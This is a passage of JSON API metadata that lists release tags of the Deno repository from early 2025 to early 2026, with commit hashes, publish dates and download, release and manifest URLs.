t":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://re